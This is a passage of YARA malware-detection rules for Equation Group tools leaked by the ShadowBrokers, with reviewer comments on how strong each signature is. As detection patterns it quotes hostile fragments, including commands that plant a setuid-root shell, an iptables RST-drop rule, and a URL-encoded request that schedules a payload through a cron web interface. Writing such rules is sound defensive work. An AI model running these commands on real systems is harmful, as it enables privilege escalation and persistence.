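        description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        super_rule = 1
        hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
        hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
    strings:
        // Expect/Tcl file-transfer shell: set/send/system lines and its banner comment
        $s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii
        // $s2 has no fullword modifier in the source rule, presumably because the matched line continues
        $s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
        $s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii
        $s4 = "# ftshell -- File Transfer Shell" fullword ascii
    condition:
        ( uint16(0) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them )
}

rule EquationGroup__scanner_scanner_v2_1_2 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        super_rule = 1
        hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
        hash2 = "9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff"
    strings:
        $s1 = "Welcome to the network scanning tool" fullword ascii
        $s2 = "Scanning port %d" fullword ascii
        // Operator output directory; the /current/ root recurs across this tool set
        $s3 = "/current/down/cmdout/scans" fullword ascii
        $s4 = "Scan for SSH version" fullword ascii
        // NOTE(review): $s5 resembles the rpcinfo -p column header; on its own it is weak, but the
        // ELF branch needs two strings and the ungated branch needs all five
        $s5 = "program vers proto port service" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 100KB and 2 of them ) or ( all of them )
}

rule EquationGroup__ghost_sparc_ghost_x86_3 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        super_rule = 1
        hash1 = "d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1"
        hash2 = "82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33"
    strings:
        // Usage and shellcode-delivery messages shared by the SPARC and x86 builds
        $x1 = "Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target" fullword ascii
        $x2 = "Sending shellcode as part of an open command..."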
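fullword ascii   // modifiers of $x2 of EquationGroup__ghost_sparc_ghost_x86_3, whose header is on the preceding line
        $x3 = "cmdshellcode" fullword ascii
        $x4 = "You will not be able to run the shellcode. Exiting..." fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 70KB and 1 of them ) or ( 2 of them )
}

rule EquationGroup__pclean_v2_1_1_pclean_v2_1_1_4 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        super_rule = 1
        hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
        hash2 = "ab7f26faed8bc2341d0517d9cb2bbf41795f753cd21340887fc2803dc1b9a1dd"
    strings:
        // Help text common to both builds; trailing spaces are part of the original lines
        $s1 = "-c cmd_name: strncmp() search for 1st %d chars of commands that " fullword ascii
        $s2 = "e.g.: -n 1-1024,1080,6666,31337 " fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 50KB and all of them )
}

rule EquationGroup__jparsescan_parsescan_5 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        super_rule = 1
        hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
        hash2 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
    strings:
        // Comment and code lines shared by the two Perl parsers
        $s1 = "# default is to dump out all scanned hosts found" fullword ascii
        $s2 = "$bool .= \" -r \" if (/mibiisa.* -r/);" fullword ascii
        $s3 = "sadmind is available on two ports, this also works)" fullword ascii
        $s4 = "-x IP gives \\\"hostname:# users:load ...\\\" if positive xwin scan" fullword ascii
    condition:
        ( uint16(0) == 0x2123 and filesize < 40KB and 1 of them ) or ( 2 of them )
}

rule EquationGroup__funnelout_v4_1_0_1 {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        super_rule = 1
        // NOTE(review): only hash2 survives in the source rule (no hash1) although super_rule is set;
        // the key is left as-is so it still lines up with whatever upstream file list it came from
        hash2 = "457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33"
    strings:
        // Perl that emits PHP; bbsessionhash is a forum session-cookie name, so this appears to
        // target a bulletin-board product
        $s1 = "header(\"Set-Cookie: bbsessionhash=\" . \\$hash . \"; path=/; HttpOnly\");" fullword ascii
        $s2 = "if ($code =~ /proxyhost/) {" fullword ascii
        $s3 = "\\$rk[1] = \\$rk[1] - 1;" fullword ascii
        $s4 = "#existsUser($u) or die \"User '$u' does not exist in database.\\n\";" fullword ascii
    condition:
        ( uint16(0) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
}

rule EquationGroup__magicjack_v1_1_0_0_client {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        super_rule = 1
        hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
    strings:
        // NOTE(review): $s1/$s2 look like a textbook block-cipher permutation step as found in
        // pure-Python crypto libraries; any script embedding such a library could satisfy them,
        // which is why three of four are required even under the shebang gate
        $s1 = "temp = ((left >> 1) ^ right) & 0x55555555" fullword ascii
        $s2 = "right ^= (temp << 16) & 0xffffffff" fullword ascii
        $s3 = "tempresult = \"\"" fullword ascii
        $s4 = "num = self.bytes2long(data)" fullword ascii
    condition:
        ( uint16(0) == 0x2123 and filesize < 80KB and 3 of them ) or ( all of them )
}

rule EquationGroup__ftshell {
    meta:
        description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-08"
        super_rule = 1
        hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
        // FIX: the source rule labelled this digest hash4; it is the same second file that the
        // sibling EquationGroup__ftshell_ftshell_v3_10_3_0 rule lists as hash2, so the key is
        // aligned with that rule. Matching behaviour is unaffected.
        hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
    strings:
        // Tcl fragments of the file-transfer shell
        $s1 = "if { [string length $uRemoteUploadCommand]" fullword ascii
        // NOTE(review): $s2 is a bare identifier and weak on its own; two strings are always required
        $s2 = "processUpload" fullword ascii
        $s3 = "global dothisreallyquiet" fullword ascii
    condition:
        ( uint16(0) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
}

/*
   Yara Rule Set
   Author: Florian Roth
   Date: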
2017-04-09
   Identifier: Equation Group hack tools leaked by ShadowBrokers
*/

/* Rule Set ----------------------------------------------------------------- */

rule EquationGroup_store_linux_i386_v_3_3_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "abc27fda9a0921d7cf2863c29768af15fdfe47a0b3e7a131ef7e5cc057576fbc"
    strings:
        // Error strings of the "Store" configuration utility that the morerats scripts below drive
        $s1 = "[-] Failed to map file: %s" fullword ascii
        $s2 = "[-] can not NULL terminate input data" fullword ascii
        $s3 = "[!] Name has size of 0!" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 60KB and all of them )
}

rule EquationGroup_morerats_client_genkey {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "0ce455fb7f46e54a5db9bef85df1087ff14d2fc60a88f2becd5badb9c7fe3e89"
    strings:
        // Python key generator shelling out to openssl; both lines are required
        $x1 = "rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')" fullword ascii
        $x2 = "client_auth = binascii.hexlify(lo_execute('openssl rand 16'))" fullword ascii
    condition:
        ( filesize < 3KB and all of them )
}

rule EquationGroup_cursetingle_2_0_1_2_mswin32_v_2_0_1 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "614bf159b956f20d66cedf25af7503b41e91841c75707af0cdf4495084092a61"
    strings:
        // Timestamp format and hex charset shared across the curse* family. The transposed
        // "ABCEDF" is presumably copied from the sample itself — do not "correct" it.
        $s1 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
        $s2 = "0123456789abcdefABCEDF:" fullword ascii
    condition:
        // PE magic ("MZ" as a little-endian uint16); both generic strings are required
        ( uint16(0) == 0x5a4d and filesize < 300KB and all of them )
}

rule EquationGroup_cursesleepy_mswin32_v_1_0_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "6293439b4b49e94f923c76e302f5fc437023c91e063e67877d22333f05a24352"
    strings:
        $s1 = "A}%j,R" fullword ascii
        // NOTE(review): $op1 embeds what look like absolute 0x0041xxxx addresses, so it pins this
        // exact build and will not survive a relink; $op2 is position-independent
        $op1 = { a1 e0 43 41 00 8b 0d 34 44 41 00 6b c0 } /* Opcode */
        $op2 = { 33 C0 F3 A6 74 14 8B 5D 08 8B 4B 34 50 } /* Opcode */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them )
}

rule EquationGroup_porkserver_v3_0_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "7b5f86e289047dd673e8a09438d49ec43832b561bac39b95098f5bf4095b8b4a"
    strings:
        // NOTE(review): same sample as EquationGroup_porkserver earlier in the set. These strings read
        // like the log/debug messages of a classic BSD inetd, from which the tool appears derived;
        // a stock inetd binary under 70KB may well satisfy four of them, so allow-list by hash.
        $s1 = "%s: %s rpcprog=%d, rpcvers = %d/%d, proto=%s, wait.max=%d.%d, user.group=%s.%s builtin=%lx server=%s" fullword ascii
        $s2 = "%s/%s server failing (looping), service terminated" fullword ascii
        $s3 = "getpwnam: %s: No such user" fullword ascii
        $s4 = "execv %s: %m" fullword ascii
        $s5 = "%s/%s: getsockname: %m" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 70KB and 4 of them )
}

rule EquationGroup_cursehelper_win2k_i686_v_2_2_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "5ac6fde8a06f4ade10d672e60e92ffbf78c4e8db6b5152e23171f6f53af0bfe1"
    strings:
        // Base64 alphabet with a non-standard "{}" tail — more specific than the plain alphabet
        $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}" fullword ascii
        $op1 = { 8d b5 48 ff ff ff 89 34 24 e8 56 2a 00 00 c7 44 } /* Opcode */
        $op2 = { e9 a2 f2 ff ff ff 85 b4 fe ff ff 8b 95 a8 fe ff } /* Opcode */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 500KB and all of them )
}

rule EquationGroup_morerats_client_addkey {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "6c67c03716d06a99f20c1044585d6bde7df43fee89f38915db0b03a42a3a9f4b"
    strings:
        // NOTE(review): help text like this is normally column-padded; if this copy of the rule lost
        // internal whitespace, the fullword pattern will silently never match — verify upstream
        $x1 = "print ' -s storebin use storebin as the Store 
executable\\n'" fullword ascii
        $x2 = "os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))" fullword ascii
        $x3 = "print ' -k keyfile the key text file to inject'" fullword ascii
    condition:
        // Python helper script, no magic gate (the rule header and $x1 begin on the preceding line)
        ( filesize < 20KB and 1 of them )
}

rule EquationGroup_noclient_3_3_2 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72"
    strings:
        $x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" fullword ascii
        // Dropping outbound RSTs is the classic trick of a tool that crafts its own TCP segments
        $x2 = "iptables -%c OUTP UT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" fullword ascii
        $x3 = "noclient: failed to execute %s: %s" fullword ascii
        $x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
        // NOTE(review): $s5 is the weakest string (no fullword, generic wording) and alone satisfies
        // "1 of them" in any file under 1000KB
        $s5 = "Attempting connection from 0.0.0.0:" ascii
    condition:
        ( filesize < 1000KB and 1 of them )
}

rule EquationGroup_curseflower_mswin32_v_1_0_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf"
    strings:
        // NOTE(review): $s1 looks like x86 code bytes that happen to be printable rather than real text;
        // treat it as a build-specific pattern
        $s1 = "<pVt,<et(<st$<ct$<nt" fullword ascii
        $op1 = { 6a 04 83 c0 08 6a 01 50 e8 10 34 00 00 83 c4 10 } /* Opcode */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 300KB and all of them )
}

rule EquationGroup_tmpwatch {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "65ed8066a3a240ee2e7556da74933a9b25c5109ffad893c21a626ea1b686d7c1"
    strings:
        // Shell snippet that plants a setuid-root shell; /tmp/tmpwatch is the payload referenced by
        // the gr and gr_dev_bin_post rules below (cronCommand=%2Ftmp%2Ftmpwatch)
        $s1 = "chown root:root /tmp/.scsi/dev/bin/gsh" fullword ascii
        $s2 = "chmod 4777 /tmp/.scsi/dev/bin/gsh" fullword ascii
    condition:
        ( filesize < 1KB and 1 of them )
}

rule EquationGroup_orleans_stride_sunos5_9_v_2_4_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "6a30efb87b28e1a136a66c7708178c27d63a4a76c9c839b2fc43853158cb55ff"
    strings:
        // NOTE(review): all three strings are individually weak ($s1 looks like a Solaris libc symbol,
        // $s2 recurs in the curse* rules); they only carry signal together with the ELF gate
        $s1 = "_lib_version" fullword ascii
        $s2 = ",%02d%03d" fullword ascii
        $s3 = "TRANSIT" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 200KB and all of them )
}

rule EquationGroup_morerats_client_noprep {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "a5b191a8ede8297c5bba790ef95201c516d64e2898efaeb44183f8fdfad578bb"
    strings:
        // Python that drives the Store utility with NOPEN arguments
        $x1 = "storestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)" fullword ascii
        $x2 = "The NOPEN-args provided are injected into infile if it is a valid" fullword ascii
        // NOTE(review): option help is normally column-padded; if whitespace was collapsed in this copy,
        // this fullword string will never match — verify against the upstream rule
        $x3 = " -i do not autokill after 5 hours" fullword ascii
    condition:
        ( filesize < 9KB and 1 of them )
}

rule EquationGroup_cursezinger_linuxrh7_3_v_2_0_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "af7c7d03f59460fa60c48764201e18f3bd3f72441fd2e2ff6a562291134d2135"
    strings:
        // Format strings shared with the Windows curse* builds plus two names that look like
        // libc-internal symbols; all four are required
        $s1 = ",%02d%03d" fullword ascii
        $s2 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
        $s3 = "__strtoll_internal" fullword ascii
        $s4 = "__strtoul_internal" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 400KB and all of them )
}

rule EquationGroup_seconddate_ImplantStandalone_3_0_3 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "d687aa644095c81b53a69c206eb8d6bdfe429d7adc2a57d87baf8ff8d4233511"
    strings:
        // NOTE(review): these read like x86-64 instruction bytes that happen to be printable
        // ("Hc" = 48 63), not real text; they pin one build and will not survive recompilation
        $s1 = "EFDGHIJKLMNOPQRSUT" fullword ascii
        $s2 = "G8HcJ HcF LcF0LcN" fullword ascii
        $s3 = "GhHcJ0HcF@LcF0LcN8H" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 1000KB and all of them )
}

rule EquationGroup_watcher_solaris_i386_v_3_3_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "395ec2531970950ffafde234dded0cce0c95f1f9a22763d1d04caa060a5222bb"
    strings:
        // $s1/$s6 look like Solaris runtime symbols, $s2 a getopt-style error prefix; all four required
        $s1 = "getexecname" fullword ascii
        $s2 = "invalid option `" fullword ascii
        $s6 = "__fpstart" fullword ascii
        $s12 = "GHFIJKLMNOPQRSTUVXW" fullword ascii
    condition:
        ( uint16(0) == 0x457f and filesize < 700KB and all of them )
}

rule EquationGroup_gr_dev_bin_now {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "f5ed8312fc6e624b04e1e2d6614f3c651c9e9902ff41f4d069c32caca0869fa4"
    strings:
        // Tiny shell driver that invokes a local redmin CGI with a forged Referer
        $x1 = "HTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"" fullword ascii
        $x2 = "exec /usr/share/redmin/cgi/redmin" fullword ascii
    condition:
        ( filesize < 1KB and 1 of them )
}

rule EquationGroup_gr_dev_bin_post {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "c1546155efa95dbc4e3cc95299a3968fc075f89d33164e78b00b76c7d08a0591"
    strings:
        // URL-encoded POST body scheduling /tmp/tmpwatch as a cron command (see EquationGroup_tmpwatch);
        // no fullword so it also matches when embedded in a longer body
        $x1 = "op=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005" ascii
    condition:
        ( filesize < 1KB and all of them )
}

rule EquationGroup_curseyo_win2k_v_1_0_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "5dc77614764b23a38610fdd8abe5b2274222f206889e4b0974a3fea569055ed6"
    strings:
        // Same transposed hex charset as the other curse* rules; kept verbatim
        $s1 = "0123456789abcdefABCEDF:" fullword ascii
        $op0 = { c6 06 5b 8b bd 70 ff ff ff 8b 9d 64 ff ff ff 0f } /* Opcode */
        $op1 = { 55 b8 ff ff ff ff 89 e5 83 ec 28 89 7d fc 8b 7d } /* Opcode */
        // $op2 carries an absolute 0x0041xxxx address and is build-specific
        $op2 = { ff 05 10 64 41 00 89 34 24 e8 df 1e 00 00 e9 31 } /* Opcode */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 200KB and all of them )
}

rule EquationGroup_gr {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "d3cd725affd31fa7f0e2595f4d76b09629918612ef0d0307bb85ade1c3985262"
    strings:
        // Shell wrapper around the /tmp/tmpwatch payload; both lines are required
        $s1 = "if [ -f /tmp/tmpwatch ] ; then" fullword ascii
        $s2 = "echo \"bailing. try a different name\"" fullword ascii
    condition:
        ( filesize < 1KB and all of them )
}

rule EquationGroup_curseroot_win2k_v_2_1_0 {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "a1637948ed6ebbd2e582eb99df0c06b27a77c01ad1779b3d84c65953ca2cb603"
    strings:
        // Base64 alphabet fused with a "%s,%s" format — shared with the cursewham super rule below
        $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
        $op0 = { c7 44 24 04 ff ff ff ff 89 04 24 e8 46 65 01 00 } /* Opcode */
        $op1 = { 8d 5d 88 89 1c 24 e8 24 1b 01 00 be ff ff ff ff } /* Opcode */
        $op2 = { d3 e0 48 e9 0c ff ff ff 8b 45 } /* Opcode */
    condition:
        // The charset string is mandatory; any two of the three opcode patterns complete the match
        ( uint16(0) == 0x5a4d and filesize < 400KB and $s1 and 2 of ($op*) )
}

rule EquationGroup_cursewham_curserazor_cursezinger_curseroot_win2k {
    meta:
        description = "Equation Group hack tool set"
        author = "Florian Roth"
        reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
        date = "2017-04-09"
        hash1 = "aff27115ac705859871ab1bf14137322d1722f63705d6aeada43d18966843225"
        hash2 = "7a25e26950bac51ca8d37cec945eb9c38a55fa9a53bc96da53b74378fb10b67e"
    strings:
        // Strings common to several curse* Windows builds; the opcode patterns and condition follow on the next line
        $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
        $s3 = ",%02d%03d" fullword ascii
        $s4 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
$op1 = { 7d ec 8d 74 3f 01 0f af f7 c1 c6 05 } /* Opcode */
      $op2 = { 29 f1 89 fb d3 eb 89 f1 d3 e7 } /* Opcode */
      $op3 = { 7d e4 8d 5c 3f 01 0f af df c1 c3 05 } /* Opcode */
   condition:
      // Any three of the six strings/opcodes in a PE under 400KB.
      ( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them )
}

// 32-bit Linux "watcher" (0x457f is the ELF magic "\x7fE" read little-endian).
// Mixes getopt-style messages with two odd wide strings ($s9/$s13) that look
// like table or encoded data rather than text; all five must be present.
rule EquationGroup_watcher_linux_i386_v_3_3_0 {
   meta:
      description = "Equation Group hack tool set"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-09"
      hash1 = "ce4c9bfa25b8aad8ea68cc275187a894dec5d79e8c0b2f2f3ec4184dc5f402b8"
   strings:
      $s1 = "invalid option `" fullword ascii
      $s8 = "readdir64" fullword ascii
      $s9 = "89:z89:%r%opw" fullword wide
      $s13 = "Ropopoprstuvwypypop" fullword wide
      $s17 = "Missing argument for `-x'." fullword ascii
   condition:
      ( uint16(0) == 0x457f and filesize < 700KB and all of them )
}

// "charm_saver" for win2k. $s2 is a hex-digit alphabet with a transposed
// "ABCEDF"; that transposition is part of the signature, keep it verbatim.
rule EquationGroup_charm_saver_win2k_v_2_0_0 {
   meta:
      description = "Equation Group hack tool set"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-09"
      hash1 = "0f7936a37482532a8ba5df4112643ed7579dd0e59181bfca9c641b9ba0a9912f"
   strings:
      $s2 = "0123456789abcdefABCEDF:" fullword ascii
      $op0 = { b8 ff ff ff ff 7f 65 eb 30 8b 55 0c 89 d7 0f b6 } /* Opcode */
      $op2 = { ba ff ff ff ff 83 c4 6c 89 d0 5b 5e 5f 5d c3 90 } /* Opcode */
   condition:
      ( uint16(0) == 0x5a4d and filesize < 400KB and all of them )
}

// "cursehappy" for win2k: opcode-only rule, both fragments required. The e8
// call with its literal rel32 displacement makes this specific to this build.
rule EquationGroup_cursehappy_win2k_v_6_1_0 {
   meta:
      description = "Equation Group hack tool set"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-09"
      hash1 = "eb669afd246a7ac4de79724abcce5bda38117b3138908b90cac58936520ea632"
   strings:
      $op1 = { e8 24 2c 01 00 85 c0 89 c6 ba ff ff ff ff 74 d6 } /* Opcode */
      $op2 = { 89 4c 24 04 89 34 24 89 44 24 08 e8 ce 49 ff ff } /* Opcode */
   condition:
      ( uint16(0) == 0x5a4d and filesize < 400KB and all of them )
}

// "morerats" client Store tool (ELF, see the 0x457f check in its condition).
rule EquationGroup_morerats_client_Store {
   meta:
      description =
"Equation Group hack tool set"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-09"
      hash1 = "619944358bc0e1faffd652b6af0600de055c5e7f1f1d91a8051ed9adf5a5b465"
   strings:
      $s1 = "[-] Failed to mmap file: %s" fullword ascii
      $s2 = "[-] can not NULL terminate input data" fullword ascii
      $s3 = "Missing argument for `-x'." fullword ascii
      $s4 = "[!] Value has size of 0!" fullword ascii
   condition:
      // ELF under 60KB with any two of the four messages.
      ( uint16(0) == 0x457f and filesize < 60KB and 2 of them )
}

// 64-bit Linux "watcher"; keyed on the "forceprism" option names plus a
// generic getopt message, all required.
rule EquationGroup_watcher_linux_x86_64_v_3_3_0 {
   meta:
      description = "Equation Group hack tool set"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-09"
      hash1 = "a8d65593f6296d6d06230bcede53b9152842f1eee56a2a72b0a88c4f463a09c3"
   strings:
      $s1 = "forceprismheader" fullword ascii
      $s2 = "invalid option `" fullword ascii
      $s3 = "forceprism" fullword ascii
   condition:
      ( uint16(0) == 0x457f and filesize < 900KB and all of them )
}

// Linux "exactchange" exploit tool, four sample hashes. A single status
// message is enough to match, so the strings are the whole signature; the
// wording is distinctive enough that false positives should be rare.
rule EquationGroup_linux_exactchange {
   meta:
      description = "Equation Group hack tool set"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-09"
      super_rule = 1
      hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
      hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
      hash3 = "39d4f83c7e64f5b89df9851bdba917cf73a3449920a6925b6cd379f2fdec2a8b"
      hash4 = "15e12c1c27304e4a68a268e392be4972f7c6edf3d4d387e5b7d2ed77a5b43c2c"
   strings:
      $x1 = "[+] looking for vulnerable socket" fullword ascii
      $x2 = "can't use 32-bit exploit on 64-bit target" fullword ascii
      $x3 = "[+] %s socket ready, exploiting..." fullword ascii
      $x4 = "[!] nothing looks vulnerable, trying everything" fullword ascii
   condition:
      ( uint16(0) == 0x457f and filesize < 2000KB and 1 of them )
}

// x86-only variant of the rule above (its two hashes are hash1/hash2 of
// EquationGroup_linux_exactchange), keyed on kernel-layout messages.
rule EquationGroup_x86_linux_exactchange {
   meta:
      description = "Equation Group hack tool set"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-09"
      super_rule = 1
      hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
